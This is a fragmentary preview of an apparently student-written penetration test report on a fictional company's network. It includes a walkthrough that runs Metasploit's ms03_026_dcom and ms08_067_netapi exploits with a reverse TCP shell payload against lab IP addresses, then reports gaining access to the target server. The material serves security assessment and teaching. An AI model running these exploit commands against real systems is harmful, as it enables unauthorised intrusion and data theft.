preview

Vulnerability Penetration Test

Better Essays

This report presents the results of the vulnerability assessment and penetration test of Penhaligon's network infrastructure and company website.
The purpose of this assessment is to identify website and network level security issues that could compromise the confidentiality of customer data on Penhaligon's servers and to provide any evidence of security issues for a forthcoming security audit.
This report details the scope of testing conducted, all significant findings along with detailed remedial advice. The summary below provides the key findings and relates these back to business impacts. Section two of this report relates the key findings. Section three of this report highlights potential control areas where Penhaligon may want to invest …show more content…

Picture No 7.
Next step search unreal and information one of them, Picture 08.
At the msf> prompt I type: use exploit/windows/dcerpc/ms03_026_dcom
(This is a famous known exploit for Windows XP systems).
As you can see in picture No 6, we are in the Victim PC_XP.
In the following step I'll try to take the control of the server.
From terminal going to the desired path running the command: cd / opt / metasploit / msf3 then ./msfcli -h to see the options we have. Then we will use a known vulnerability of windows: ms08_067netapi. Running on the target system running windows server 2003 begin operating procedure.
So from a terminal we write: msfcli windows/smb/ms08_067_netapi O and that shows the options to exploit penetration gateway, the target ip, the port and the running OS (picture No 9).
Then we load the appropriate payload to perform the exploit msfcli windows / smb / ms08_067_netapi RHOST = 192.168.56.1 LHOST = 192.168.56.8 PAYLOAD = windows / shell / reverse_tcp E (where RHOST the ip of LHOST target system pc that runs).
As you can see in Pic No 10, we are in the Victim PC_server 2003 and in Pic No 11 you can see the files and folder of the server.
1.1.4 …show more content…

However, when access to the Penhaligon is obtained as a result of the testing, the penetration tester may elect to continue exploring inside the network and further the attack against other systems within the Penhaligon and may also include testing any data-loss prevention controls that are in place. Testing may include locations of cardholder data, applications that store, process, or transmit cardholder data, critical network connections, access points, and other targets appropriate for the complexity and size of the organization. This should include resources and assets (i.e., any resource or asset that allows an attacker to obtain the credentials with access to or a route into the Penhaligon) utilized by users responsible for maintaining the systems that store, process, or transmit cardholder data or by users with the ability and authority to access cardholder

Get Access